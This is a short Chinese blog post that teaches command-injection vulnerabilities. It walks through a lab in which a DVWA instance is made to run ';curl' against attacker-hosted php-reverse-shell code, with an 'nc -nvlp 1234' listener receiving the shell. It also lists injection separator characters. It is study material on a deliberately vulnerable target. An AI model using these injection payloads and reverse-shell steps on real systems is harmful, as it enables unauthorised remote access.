命令执行漏洞

漏洞产生原因:程序开发人员直接调用操作系统层面的功能

如何避免:不调用操作系统的功能,或者调用操作系统功能后对用户的输入严格过滤

如何利用:

;    |     &    &&    \

被过滤后使用对特殊符号编码或者其他方法绕过 

 

 

实验:

  • 开启 kali apache服务

  service apache2 start

  • 将php-reverse-shell拷贝到kali的www目录下

  

 

  • 将php-reverse-shell的反弹ip地址和端口修改成攻击者的主机ip地址和端口

 

  • kali攻击者主机侦听1234端口,用来接收反弹shell(nc -nvlp 1234,n表示不只是ip地址不做dns查询,v表示结果可视化,l表示监听进入的连接,p指定端口号)

 

  • 在DVWA的远程代码执行页面上运行;curl http://192.168.43.43/remote_exc.php(curl:在命令行中定制http请求)

 

 

  •  成功将自己主机的shell反射到nc

 

这个过程就是通过dvwa访问本机的remote_exc.php,执行php中的代码,将本机的shell反弹到nc。。。。。

 

posted @ 2018-09-02 15:30  galwayboy  阅读(540)  评论(0)    收藏  举报